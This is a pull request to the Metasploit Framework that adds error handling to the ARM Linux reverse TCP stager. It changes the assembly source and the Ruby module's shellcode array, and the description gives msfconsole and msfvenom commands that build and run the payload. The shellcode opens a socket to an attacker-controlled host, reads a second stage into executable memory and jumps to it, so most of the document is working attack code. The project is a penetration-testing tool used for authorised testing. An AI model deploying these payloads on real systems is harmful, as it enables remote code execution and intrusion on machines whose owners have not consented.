### PR TITLE
Add error handling to ARM linux reverse tcp stager

### DIFF
--- a/external/source/shellcode/linux/armle/stager_sock_reverse.s
+++ b/external/source/shellcode/linux/armle/stager_sock_reverse.s
@@ -2,7 +2,7 @@
 @
 @        Name: stager_sock_reverse
 @   Qualities: -
-@     Authors: nemo <nemo [at] felinemenace.org>
+@     Authors: nemo <nemo [at] felinemenace.org>, tkmru
 @     License: MSF_LICENSE
 @ Description:
 @
@@ -37,7 +37,7 @@ _start:
 	cmp r0, #0
 	blt failed
 @ int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen);
-    mov r12,r0         @ sockfd
+  mov r12,r0         @ sockfd
 	add r7,#2          @ __NR_socket
 	add r1,pc,#196     @ *addr
 	mov r2,#16         @ addrlen
@@ -45,7 +45,7 @@ _start:
 	cmp r0, #0
 	blt failed
 @ ssize_t recv(int sockfd, void *buf, size_t len, int flags);
-    mov r0,r12         @ sockfd
+  mov r0,r12         @ sockfd
 	sub sp,#4
 	add r7,#8          @ __NR_recv
 	mov r1,sp          @ *buf (on the stack)
@@ -65,7 +65,7 @@ _start:
 	mov r7, #192       @ __NR_mmap2
 	ldr r0,=0xffffffff @ *addr = NULL
 	mov r2,#7          @ prot  = PROT_READ | PROT_WRITE | PROT_EXEC
-    ldr r3,=0x1022     @ flags = MAP_ANON | MAP_PRIVATE
+  ldr r3,=0x1022     @ flags = MAP_ANON | MAP_PRIVATE
 	mov r4,r0          @ fd
 	mov r5,#0          @ pgoffset
 	swi 0
@@ -85,7 +85,7 @@ loop:
 	cmp r2, #0
 	ble last
 	mov r2,#1000       @ len
-	swi 0	
+	swi 0
 	cmp r0, #0
 	blt failed
 	b loop
@@ -102,7 +102,7 @@ failed:
 	swi 0
 @ addr
 @ port: 4444 , sin_fam = 2
-.word   0x5c110002 
+.word   0x5c110002
 @ ip: 127.0.0.1
 .word   0x01aca8c0
 @.word   0x0100007f

--- a/modules/payloads/stagers/linux/armle/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/armle/reverse_tcp.rb
@@ -34,21 +34,25 @@ module MetasploitModule
         {
           'Offsets' =>
             {
-              'LPORT' => [ 182, 'n'    ],
-              'LHOST' => [ 184, 'ADDR' ],
+              'LPORT' => [ 242, 'n'    ],
+              'LHOST' => [ 244, 'ADDR' ],
             },
           'Payload' =>
           [
-            0xe59f70b4,          #        ldr     r7, [pc, #180]    ; set 281(0x119) to r7
+            0xe59f70f0,          #        ldr     r7, [pc, #240]    ; set 281(0x119) to r7
             0xe3a00002,          #        mov     r0, #2
             0xe3a01001,          #        mov     r1, #1
             0xe3a02006,          #        mov     r2, #6
             0xef000000,          #        svc     0x00000000        ; invoke socket
+            0xe3500000,          #        cmp     r0, #0
+            0xba000031,          #        blt     817c <failed>
             0xe1a0c000,          #        mov     ip, r0
             0xe2877002,          #        add     r7, r7, #2        ; set 283(0x11b) to r7
-            0xe28f1090,          #        add     r1, pc, #144      ; set 0x0a1a0002 to r1
+            0xe28f10c4,          #        add     r1, pc, #196      ; set first .word addr to r1
             0xe3a02010,          #        mov     r2, #16
             0xef000000,          #        svc     0x00000000        ; invoke connect
+            0xe3500000,          #        cmp     r0, #0
+            0xba00002a,          #        blt     817c <failed>
             0xe1a0000c,          #        mov     r0, ip
             0xe24dd004,          #        sub     sp, sp, #4
             0xe2877008,          #        add     r7, r7, #8        ; set 291(0x123) to r7
@@ -56,8 +60,10 @@ module MetasploitModule
             0xe3a02004,          #        mov     r2, #4
             0xe3a03000,          #        mov     r3, #0
             0xef000000,          #        svc     0x00000000        ; invoke recv
+            0xe3500000,          #        cmp     r0, #0
+            0xba000021,          #        blt     817c <failed>
             0xe59d1000,          #        ldr     r1, [sp]
-            0xe59f3070,          #        ldr     r3, [pc, #112]    ; set 0xfffff000 to r3
+            0xe59f3094,          #        ldr     r3, [pc, #148]    ; set 0xfffff000 to r3
             0xe0011003,          #        and     r1, r1, r3
             0xe3a02001,          #        mov     r2, #1
             0xe1a02602,          #        lsl     r2, r2, #12
@@ -65,25 +71,37 @@ module MetasploitModule
             0xe3a070c0,          #        mov     r7, #192          ; set 192(0xC0) to r7
             0xe3e00000,          #        mvn     r0, #0            ; set 0xffffffff to r0
             0xe3a02007,          #        mov     r2, #7
-            0xe59f3054,          #        ldr     r3, [pc, #84]     ; set 0x1022 to r3
+            0xe59f3078,          #        ldr     r3, [pc, #120]    ; set r3 to 0x1022
             0xe1a04000,          #        mov     r4, r0
             0xe3a05000,          #        mov     r5, #0
             0xef000000,          #        svc     0x00000000        ; invoke mmap2
+            0xe3500000,          #        cmp     r0, #0
+            0xba000012,          #        blt 817c <failed>
             0xe2877063,          #        add     r7, r7, #99       ; set 291(0x123) to r7
             0xe1a01000,          #        mov     r1, r0
             0xe1a0000c,          #        mov     r0, ip
             0xe3a03000,          #        mov     r3, #0
-            0xe59d2000,          # loop:  ldr     r2, [sp]
+                                 #  loop:
+            0xe59d2000,          #        ldr     r2, [sp]
             0xe2422ffa,          #        sub     r2, r2, #1000
             0xe58d2000,          #        str     r2, [sp]
             0xe3520000,          #        cmp     r2, #0
             0xda000002,          #        ble     80fc <last>
             0xe3a02ffa,          #        mov     r2, #1000
             0xef000000,          #        svc     0x00000000        ; invoke recv
+            0xe3500000,          #        cmp     r0, #0
+            0xba000005,          #        blt     817c <failed>
             0xeafffff7,          #        b       80dc <loop>
-            0xe2822ffa,          # last:  add     r2, r2, #1000
+                                 #  last:
+            0xe2822ffa,          #        add     r2, r2, #1000
             0xef000000,          #        svc     0x00000000        ; invoke recv
+            0xe3500000,          #        cmp r0, #0
+            0xba000000,          #        blt 817c <failed>
             0xe1a0f001,          #        mov     pc, r1
+                                 #  failed:
+            0xe3a07001,          #        mov r7, #1
+            0xe3a00001,          #        mov r0, #1
+            0xef000000,          #        svc 0x00000000
             0x5c110002,          #  .word   0x5c110002
             0x0100007f,          #  .word   0x0100007f
             0x00000119,          #  .word   0x00000119

--- a/modules/payloads/stagers/linux/armle/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/armle/reverse_tcp.rb
@@ -39,6 +39,7 @@ module MetasploitModule
             },
           'Payload' =>
           [
+            # Generated from external/source/shellcode/linux/armle/stager_sock_reverse.s
             0xe59f70f0,          #        ldr     r7, [pc, #240]    ; set 281(0x119) to r7
             0xe3a00002,          #        mov     r0, #2
             0xe3a01001,          #        mov     r1, #1
@@ -75,8 +76,8 @@ module MetasploitModule
             0xe1a04000,          #        mov     r4, r0
             0xe3a05000,          #        mov     r5, #0
             0xef000000,          #        svc     0x00000000        ; invoke mmap2
-            0xe3500000,          #        cmp     r0, #0
-            0xba000012,          #        blt 817c <failed>
+            0xe3700001,          #        cmn     r0, #1
+            0x0a000012,          #        beq     <failed>
             0xe2877063,          #        add     r7, r7, #99       ; set 291(0x123) to r7
             0xe1a01000,          #        mov     r1, r0
             0xe1a0000c,          #        mov     r0, ip
@@ -86,17 +87,17 @@ module MetasploitModule
             0xe2422ffa,          #        sub     r2, r2, #1000
             0xe58d2000,          #        str     r2, [sp]
             0xe3520000,          #        cmp     r2, #0
-            0xda000002,          #        ble     80fc <last>
+            0xda000004,          #        ble     80fc <last>
             0xe3a02ffa,          #        mov     r2, #1000
             0xef000000,          #        svc     0x00000000        ; invoke recv
             0xe3500000,          #        cmp     r0, #0
             0xba000005,          #        blt     817c <failed>
-            0xeafffff7,          #        b       80dc <loop>
+            0xeafffff5,          #        b       80dc <loop>
                                  #  last:
             0xe2822ffa,          #        add     r2, r2, #1000
             0xef000000,          #        svc     0x00000000        ; invoke recv
-            0xe3500000,          #        cmp r0, #0
-            0xba000000,          #        blt 817c <failed>
+            0xe3500000,          #        cmp     r0, #0
+            0xba000000,          #        blt     817c <failed>
             0xe1a0f001,          #        mov     pc, r1
                                  #  failed:
             0xe3a07001,          #        mov r7, #1

--- a/modules/payloads/stagers/linux/armle/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/armle/reverse_tcp.rb
@@ -17,7 +17,7 @@ require 'msf/core/handler/reverse_tcp'
 ###
 module MetasploitModule
 
-  CachedSize = 200
+  CachedSize = 260
 
   include Msf::Payload::Stager
 

--- a/modules/payloads/stagers/linux/armle/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/armle/reverse_tcp.rb
@@ -25,7 +25,7 @@ module MetasploitModule
     super(merge_info(info,
       'Name'          => 'Reverse TCP Stager',
       'Description'   => 'Connect back to the attacker',
-      'Author'        => 'nemo <nemo[at]felinemenace.org>',
+      'Author'        => ['nemo <nemo[at]felinemenace.org>', 'tkmru'],
       'License'       => MSF_LICENSE,
       'Platform'      => 'linux',
       'Arch'          => ARCH_ARMLE,
@@ -39,51 +39,51 @@ module MetasploitModule
             },
           'Payload' =>
           [
-            0xe59f70b4,          #  ldr     r7, [pc, #180]
-            0xe3a00002,          #  mov     r0, #2
-            0xe3a01001,          #  mov     r1, #1
-            0xe3a02006,          #  mov     r2, #6
-            0xef000000,          #  svc     0x00000000
-            0xe1a0c000,          #  mov     ip, r0
-            0xe2877002,          #  add     r7, r7, #2
-            0xe28f1090,          #  add     r1, pc, #144
-            0xe3a02010,          #  mov     r2, #16
-            0xef000000,          #  svc     0x00000000
-            0xe1a0000c,          #  mov     r0, ip
-            0xe24dd004,          #  sub     sp, sp, #4
-            0xe2877008,          #  add     r7, r7, #8
-            0xe1a0100d,          #  mov     r1, sp
-            0xe3a02004,          #  mov     r2, #4
-            0xe3a03000,          #  mov     r3, #0
-            0xef000000,          #  svc     0x00000000
-            0xe59d1000,          #  ldr     r1, [sp]
-            0xe59f3070,          #  ldr     r3, [pc, #112]
-            0xe0011003,          #  and     r1, r1, r3
-            0xe3a02001,          #  mov     r2, #1
-            0xe1a02602,          #  lsl     r2, r2, #12
-            0xe0811002,          #  add     r1, r1, r2
-            0xe3a070c0,          #  mov     r7, #192
-            0xe3e00000,          #  mvn     r0, #0
-            0xe3a02007,          #  mov     r2, #7
-            0xe59f3054,          #  ldr     r3, [pc, #84]
-            0xe1a04000,          #  mov     r4, r0
-            0xe3a05000,          #  mov     r5, #0
-            0xef000000,          #  svc     0x00000000
-            0xe2877063,          #  add     r7, r7, #99
-            0xe1a01000,          #  mov     r1, r0
-            0xe1a0000c,          #  mov     r0, ip
-            0xe3a03000,          #  mov     r3, #0
-            0xe59d2000,          #  ldr     r2, [sp]
-            0xe2422ffa,          #  sub     r2, r2, #1000
-            0xe58d2000,          #  str     r2, [sp]
-            0xe3520000,          #  cmp     r2, #0
-            0xda000002,          #  ble     80fc <last>
-            0xe3a02ffa,          #  mov     r2, #1000
-            0xef000000,          #  svc     0x00000000
-            0xeafffff7,          #  b       80dc <loop>
-            0xe2822ffa,          #  add     r2, r2, #1000
-            0xef000000,          #  svc     0x00000000
-            0xe1a0f001,          #  mov     pc, r1
+            0xe59f70b4,          #        ldr     r7, [pc, #180]    ; set 281(0x119) to r7
+            0xe3a00002,          #        mov     r0, #2
+            0xe3a01001,          #        mov     r1, #1
+            0xe3a02006,          #        mov     r2, #6
+            0xef000000,          #        svc     0x00000000        ; invoke socket
+            0xe1a0c000,          #        mov     ip, r0
+            0xe2877002,          #        add     r7, r7, #2        ; set 283(0x11b) to r7
+            0xe28f1090,          #        add     r1, pc, #144      ; set 0x0a1a0002 to r1
+            0xe3a02010,          #        mov     r2, #16
+            0xef000000,          #        svc     0x00000000        ; invoke connect
+            0xe1a0000c,          #        mov     r0, ip
+            0xe24dd004,          #        sub     sp, sp, #4
+            0xe2877008,          #        add     r7, r7, #8        ; set 291(0x123) to r7
+            0xe1a0100d,          #        mov     r1, sp
+            0xe3a02004,          #        mov     r2, #4
+            0xe3a03000,          #        mov     r3, #0
+            0xef000000,          #        svc     0x00000000        ; invoke recv
+            0xe59d1000,          #        ldr     r1, [sp]
+            0xe59f3070,          #        ldr     r3, [pc, #112]    ; set 0xfffff000 to r3
+            0xe0011003,          #        and     r1, r1, r3
+            0xe3a02001,          #        mov     r2, #1
+            0xe1a02602,          #        lsl     r2, r2, #12
+            0xe0811002,          #        add     r1, r1, r2        ; set 0x1000 to r1
+            0xe3a070c0,          #        mov     r7, #192          ; set 192(0xC0) to r7
+            0xe3e00000,          #        mvn     r0, #0            ; set 0xffffffff to r0
+            0xe3a02007,          #        mov     r2, #7
+            0xe59f3054,          #        ldr     r3, [pc, #84]     ; set 0x1022 to r3
+            0xe1a04000,          #        mov     r4, r0
+            0xe3a05000,          #        mov     r5, #0
+            0xef000000,          #        svc     0x00000000        ; invoke mmap2
+            0xe2877063,          #        add     r7, r7, #99       ; set 291(0x123) to r7
+            0xe1a01000,          #        mov     r1, r0
+            0xe1a0000c,          #        mov     r0, ip
+            0xe3a03000,          #        mov     r3, #0
+            0xe59d2000,          # loop:  ldr     r2, [sp]
+            0xe2422ffa,          #        sub     r2, r2, #1000
+            0xe58d2000,          #        str     r2, [sp]
+            0xe3520000,          #        cmp     r2, #0
+            0xda000002,          #        ble     80fc <last>
+            0xe3a02ffa,          #        mov     r2, #1000
+            0xef000000,          #        svc     0x00000000        ; invoke recv
+            0xeafffff7,          #        b       80dc <loop>
+            0xe2822ffa,          # last:  add     r2, r2, #1000
+            0xef000000,          #        svc     0x00000000        ; invoke recv
+            0xe1a0f001,          #        mov     pc, r1
             0x5c110002,          #  .word   0x5c110002
             0x0100007f,          #  .word   0x0100007f
             0x00000119,          #  .word   0x00000119


### PR DESCRIPTION
I add error handling to arm linux reverse tcp stager. for [Linux reverse_tcp stager segfaults when it can't connect · Issue #7722 · rapid7/metasploit-framework](https://github.com/rapid7/metasploit-framework/issues/7722).

## Verification

List the steps needed to make sure this thing works

- [x] ./msfconsole -qx "use exploit/multi/handler; set payload linux/armle/meterpreter/reverse_tcp; set lhost IP_ADDR; set lport PORT_NUMBER; set ExitOnSession false; run -j"
- [x] follow commands
```
$ ./msfvenom -p linux/armle/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=6666 -f elf -o ./reverse_tcp
$ sudo chmod +x ./reverse_tcp
$ strace ./reverse_tcp 
execve("./reverse_tcp", ["./reverse_tcp"], [/* 14 vars */]) = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(6666), sin_addr=inet_addr("192.168.0.1")}, 16) = -1 ETIMEDOUT (Connection timed out)
exit(1)                                 = ?
```

